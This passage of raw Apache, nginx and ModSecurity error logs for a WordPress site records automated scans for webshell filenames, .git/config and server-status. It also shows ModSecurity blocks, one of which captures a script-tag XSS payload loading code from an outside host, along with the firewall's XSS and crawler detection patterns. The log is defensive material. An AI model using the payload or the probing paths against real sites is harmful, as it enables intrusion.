directive [Sat Apr 06 18:06:06.818783 2024] [autoindex:error] [pid 19027:tid 140599369885440] [client 4.227.105.22:52248] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Apr 06 18:06:16.502778 2024] [:error] [pid 18337:tid 140599567226624] [client 4.227.105.22:52280] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Apr 06 18:06:16.694911 2024] [:error] [pid 18337:tid 140599550441216] [client 4.227.105.22:52282] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Apr 07 11:29:54.274094 2024] [:error] [pid 26279:tid 140584452921088] [client 216.24.210.134:39036] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Apr 07 11:30:20.733406 2024] [:error] [pid 20325:tid 140584303961856] [client 216.24.210.134:39112] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Apr 07 12:43:29.769439 2024] [:error] [pid 26235:tid 140584444528384] [client 91.108.240.244:40670] [client 91.108.240.244] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "text/plain"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZhLbQaKM9d7epU94CW7YmgAAAUQ"] [Sun Apr 07 17:52:33.216170 2024] [autoindex:error] [pid 21241:tid 140584287176448] [client 4.227.19.137:47744] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Apr 07 19:38:27.464709 2024] [:error] [pid 26158:tid 140584436135680] [client 74.208.80.213:50266] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php, referer: investigacionperu.com [Sun Apr 07 19:39:21.607507 2024] [:error] [pid 20324:tid 140584220034816] [client 74.208.80.213:50288] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php, referer: investigacionperu.com [Sun Apr 07 22:04:37.043622 2024] [autoindex:error] [pid 20325:tid 140584270391040] [client 52.156.180.218:53450] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Apr 07 22:04:41.449324 2024] [:error] [pid 21241:tid 140584303961856] [client 52.156.180.218:53462] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Apr 07 22:04:41.667078 2024] [:error] [pid 26158:tid 140584345925376] [client 52.156.180.218:53468] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sun Apr 07 22:05:16.164581 2024] [:error] [pid 21241:tid 140584312354560] [client 52.156.180.218:53574] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Apr 07 22:05:16.382101 2024] [:error] [pid 26158:tid 140584478099200] [client 52.156.180.218:53576] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sun Apr 07 22:05:18.595027 2024] [:error] [pid 26279:tid 140584278783744] [client 52.156.180.218:53586] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php [Sun Apr 07 22:05:21.840966 2024] [autoindex:error] [pid 26235:tid 140584220034816] [client 52.156.180.217:53604] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com//css/index.php [Sun Apr 07 22:06:07.824662 2024] [autoindex:error] [pid 20324:tid 140584444528384] [client 52.156.180.217:53776] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com//.well-known/index.php [Sun Apr 07 22:06:08.040425 2024] [:error] [pid 20323:tid 140584278783744] [client 52.156.180.217:53778] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Sun Apr 07 22:06:16.373413 2024] [:error] [pid 26235:tid 140584345925376] [client 52.156.180.217:53802] PHP Fatal error: Uncaught Error: Call to undefined function __() in /home/investig/public_html/wp-admin/includes/file.php:16 [Sun Apr 07 22:06:16.373521 2024] [:error] [pid 26235:tid 140584345925376] [client 52.156.180.217:53802] Stack trace: [Sun Apr 07 22:06:16.373535 2024] [:error] [pid 26235:tid 140584345925376] [client 52.156.180.217:53802] #0 {main} [Sun Apr 07 22:06:16.373618 2024] [:error] [pid 26235:tid 140584345925376] [client 52.156.180.217:53802] thrown in /home/investig/public_html/wp-admin/includes/file.php on line 16 [Sun Apr 07 22:06:17.120414 2024] [autoindex:error] [pid 21241:tid 140584452921088] [client 52.156.180.224:53806] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Apr 07 22:06:23.623340 2024] [autoindex:error] [pid 26279:tid 140584452921088] [client 52.156.180.224:53834] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com//wp-includes/js/tinymce/plugins/compat3x/css/index.php [Sun Apr 07 22:06:43.000113 2024] [:error] [pid 26279:tid 140584469706496] [client 52.156.180.224:53918] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Sun Apr 07 22:07:40.361955 2024] [:error] [pid 26158:tid 140584228427520] [client 52.156.180.224:54050] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Mon Apr 08 13:26:40.333821 2024] [:error] [pid 27180:tid 140432369460992] [client 139.59.32.205:51554] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Apr 08 13:27:20.539774 2024] [:error] [pid 27180:tid 140432352675584] [client 139.59.32.205:51636] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Apr 08 13:27:20.792603 2024] [:error] [pid 27180:tid 140432335890176] [client 139.59.32.205:51638] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Apr 08 13:29:09.030936 2024] [autoindex:error] [pid 27849:tid 140432419817216] [client 139.59.32.205:51864] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 08 13:29:35.180768 2024] [:error] [pid 27179:tid 140432369460992] [client 139.59.32.205:51910] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Apr 08 13:29:36.282305 2024] [autoindex:error] [pid 27179:tid 140432571213568] [client 139.59.32.205:51914] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 08 13:29:37.383082 2024] [autoindex:error] [pid 27849:tid 140432377853696] [client 139.59.32.205:51918] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 08 13:29:52.172227 2024] [:error] [pid 27180:tid 140432335890176] [client 139.59.32.205:51944] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Apr 08 13:29:52.428189 2024] [:error] [pid 27180:tid 140432369460992] [client 139.59.32.205:51946] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Apr 08 13:31:19.882814 2024] [:error] [pid 27179:tid 140432579606272] [client 139.59.32.205:52102] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Mon Apr 08 13:32:11.519288 2024] [:error] [pid 27849:tid 140432344282880] [client 139.59.32.205:52244] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Apr 08 13:32:11.744653 2024] [:error] [pid 27849:tid 140432461780736] [client 139.59.32.205:52246] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Apr 08 13:34:22.757702 2024] [autoindex:error] [pid 27180:tid 140432436602624] [client 139.59.32.205:52502] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 08 13:34:46.410886 2024] [:error] [pid 27180:tid 140432352675584] [client 139.59.32.205:52544] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Mon Apr 08 13:34:47.521139 2024] [autoindex:error] [pid 27180:tid 140432335890176] [client 139.59.32.205:52548] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 08 13:34:48.629792 2024] [autoindex:error] [pid 27849:tid 140432386246400] [client 139.59.32.205:52552] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 08 13:35:14.228239 2024] [:error] [pid 27849:tid 140432587998976] [client 139.59.32.205:52594] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Apr 08 13:35:14.468625 2024] [:error] [pid 27180:tid 140432571213568] [client 139.59.32.205:52596] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Mon Apr 08 17:40:05.272166 2024] [:error] [pid 27849:tid 140432587998976] [client 185.162.130.23:59308] [client 185.162.130.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://cdn.mediajsdelivery.com></script> found within ARGS:result[_msg]: <script src=https://cdn.mediajsdelivery.com></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZhRyRa4JP0Pv7cu2v7ONxAAAAME"] [Tue Apr 09 20:54:29.960449 2024] [:error] [pid 6575:tid 139985684436736] [client 185.162.130.23:44704] [client 185.162.130.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://cdn.mediajsdelivery.com></script> found within ARGS:result[_msg]: <script src=https://cdn.mediajsdelivery.com></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZhXxVTFrocEYvZNvaS21jQAAAFc"] [Wed Apr 10 06:40:51.734691 2024] [:error] [pid 18910:tid 140600888178432] [client 185.162.130.23:35016] [client 185.162.130.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:result[_msg]. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script src=https://cdn.mediajsdelivery.com></script> found within ARGS:result[_msg]: <script src=https://cdn.mediajsdelivery.com></script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/litespeed/v1/cdn_status"] [unique_id "ZhZ6w_nF2cxxqCPSmwKTBAAAAFY"] [Wed Apr 10 06:58:45.834399 2024] [:error] [pid 18911:tid 140600972105472] [client 77.221.155.237:35568] [client 77.221.155.237] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "text/plain"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZhZ-9V3VdT9z3NvNWp47YgAAAIw"] 2024/04/10 11:38:58 [error] 18872#18872: *84266 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php" failed (2: No such file or directory), client: 52.169.215.105, server: cpanel.investigacionperu.com, request: "GET /.well-known/acme-challenge/cloud.php HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/04/10 11:38:59 [error] 18872#18872: *84266 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php" failed (2: No such file or directory), client: 52.169.215.105, server: cpanel.investigacionperu.com, request: "GET /.well-known/pki-validation/xmrlpc.php?p= HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/04/10 11:38:59 [error] 18872#18872: *84266 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php" failed (2: No such file or directory), client: 52.169.215.105, server: cpanel.investigacionperu.com, request: "GET /.well-known/acme-challenge/xmrlpc.php?p= HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/04/10 11:39:01 [error] 18872#18872: *84266 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php" failed (2: No such file or directory), client: 52.169.215.105, server: cpanel.investigacionperu.com, request: "GET /.well-known/acme-challenge/license.php HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/04/10 11:39:02 [error] 18872#18872: *84266 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php" failed (2: No such file or directory), client: 52.169.215.105, server: cpanel.investigacionperu.com, request: "GET /.well-known/pki-validation/cloud.php HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/04/10 11:39:03 [error] 18872#18872: *84266 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php" failed (2: No such file or directory), client: 52.169.215.105, server: cpanel.investigacionperu.com, request: "GET /.well-known/pki-validation/about.php HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/04/10 11:39:10 [error] 18872#18872: *84266 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php" failed (2: No such file or directory), client: 52.169.215.105, server: cpanel.investigacionperu.com, request: "GET /.well-known/acme-challenge/cloud.php HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/04/10 11:39:11 [error] 18872#18872: *84266 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php" failed (2: No such file or directory), client: 52.169.215.105, server: cpanel.investigacionperu.com, request: "GET /.well-known/pki-validation/xmrlpc.php?p= HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/04/10 11:39:11 [error] 18872#18872: *84266 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php" failed (2: No such file or directory), client: 52.169.215.105, server: cpanel.investigacionperu.com, request: "GET /.well-known/acme-challenge/xmrlpc.php?p= HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/04/10 11:39:13 [error] 18872#18872: *84266 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php" failed (2: No such file or directory), client: 52.169.215.105, server: cpanel.investigacionperu.com, request: "GET /.well-known/acme-challenge/license.php HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/04/10 11:39:14 [error] 18872#18872: *84266 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php" failed (2: No such file or directory), client: 52.169.215.105, server: cpanel.investigacionperu.com, request: "GET /.well-known/pki-validation/cloud.php HTTP/1.1", host: "cpanel.investigacionperu.com" 2024/04/10 11:39:15 [error] 18872#18872: *84266 openat() "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php" failed (2: No such file or directory), client: 52.169.215.105, server: cpanel.investigacionperu.com, request: "GET /.well-known/pki-validation/about.php HTTP/1.1", host: "cpanel.investigacionperu.com" [Wed Apr 10 13:17:44.706654 2024] [authz_core:error] [pid 29838:tid 140601145419520] [client 167.99.210.137:50356] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/04/10 13:17:49 [error] 18872#18872: *86406 access forbidden by rule, client: 167.99.210.137, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Wed Apr 10 13:17:58.931363 2024] [authz_core:error] [pid 18910:tid 140600896571136] [client 206.81.24.74:50394] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/04/10 13:18:03 [error] 18871#18871: *86442 access forbidden by rule, client: 206.81.24.74, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Wed Apr 10 16:30:37.805982 2024] [authz_core:error] [pid 29838:tid 140600921749248] [client 207.154.197.113:56588] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Wed Apr 10 16:36:11.198632 2024] [authz_core:error] [pid 18910:tid 140600955320064] [client 192.46.211.230:56750] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/04/10 16:36:17 [error] 18872#18872: *89378 access forbidden by rule, client: 192.46.211.230, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Thu Apr 11 03:04:33.862596 2024] [:error] [pid 18910:tid 140601030854400] [client 192.0.87.71:46596] [client 192.0.87.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:signature. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1OnHDTHuG9foM= found within ARGS:signature: 5GHP31CmOv3KbB1OnHDTHuG9foM="] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZheZkfnF2cxxqCPSmwKWEQAAAEU"], referer: https://investigacionperu.com/?rest_route=%2Fjetpack%2Fv4%2Fsync%2Fobject&_for=jetpack&token=Z5nUQajFXxnH%40s%29G4Tnlh9C%5E6NYFP%28XC%3A1%3A0×tamp=1712822673&nonce=jUR39D6PXn&body-hash=SljWaFuv%2BRFGJ5yLzqbQGYJHiFo%3D&signature=5GHP31CmOv3KbB1OnHDTHuG9foM%3D 2024/04/11 04:30:29 [error] 29844#29844: *96872 access forbidden by rule, client: 138.199.48.4, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com", referrer: "https://www.google.com/" 2024/04/11 10:00:44 [error] 29845#29845: *99599 access forbidden by rule, client: 91.122.53.173, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Thu Apr 11 10:55:59.378313 2024] [:error] [pid 30580:tid 140526375102208] [client 84.239.45.18:57410] [client 84.239.45.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZhgID3RVaX9G_VnUrCuPxQAAAMU"] [Thu Apr 11 10:55:59.418073 2024] [:error] [pid 29892:tid 140526221223680] [client 84.239.45.18:57412] [client 84.239.45.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZhgID8Slb78yh_CPBW6P6QAAAA8"] [Thu Apr 11 10:55:59.461326 2024] [:error] [pid 29892:tid 140526296758016] [client 84.239.45.18:57414] [client 84.239.45.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/robots.txt"] [unique_id "ZhgID8Slb78yh_CPBW6P6gAAAAY"] [Thu Apr 11 10:56:00.480115 2024] [:error] [pid 29894:tid 140526212830976] [client 84.239.45.18:57416] [client 84.239.45.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line "27"] [id "990012"] [rev "2"] [msg "Rogue web site crawler"] [data "panscient.com"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/AUTOMATION/MALICIOUS"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZhgIEBexM0f3xzCbeqVPvAAAAJA"] [Thu Apr 11 10:56:00.526094 2024] [:error] [pid 29893:tid 140526254794496] [client 